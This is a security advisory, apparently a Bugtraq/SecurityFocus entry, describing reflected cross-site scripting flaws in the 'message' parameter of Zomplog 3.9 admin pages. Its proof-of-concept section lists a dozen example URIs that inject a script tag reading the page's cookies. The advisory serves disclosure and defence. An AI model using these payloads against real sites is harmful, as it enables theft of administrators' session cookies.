Zomplog 'message' Parameter Multiple Cross Site Scripting Vulnerabilities
BID:42457
Info
Zomplog 'message' Parameter Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 42457 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 15 2010 12:00AM |
| Updated: | Aug 15 2010 12:00AM |
| Credit: | 10n1z3d |
| Vulnerable: |
Zomplog Zomplog 3.9 |
| Not Vulnerable: | |
Discussion
Zomplog 'message' Parameter Multiple Cross Site Scripting Vulnerabilities
Zomplog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Zomplog 3.9 is vulnerable; other versions may also be affected.
Zomplog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Zomplog 3.9 is vulnerable; other versions may also be affected.
Exploit / POC
Zomplog 'message' Parameter Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/admin/users.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/category.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/entry.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/newentry.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/comments.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/newpage.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/page.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/settings.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/changeclothes.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/settings_theme.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/themes.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/plugins.php?message=<script>alert(document.cookie);</script>
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/admin/users.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/category.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/entry.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/newentry.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/comments.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/newpage.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/page.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/settings.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/changeclothes.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/settings_theme.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/themes.php?message=<script>alert(document.cookie);</script>
http://www.example.com/admin/plugins.php?message=<script>alert(document.cookie);</script>
Solution / Fix
Zomplog 'message' Parameter Multiple Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Zomplog 'message' Parameter Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Zomplog Homepage (Zomplog)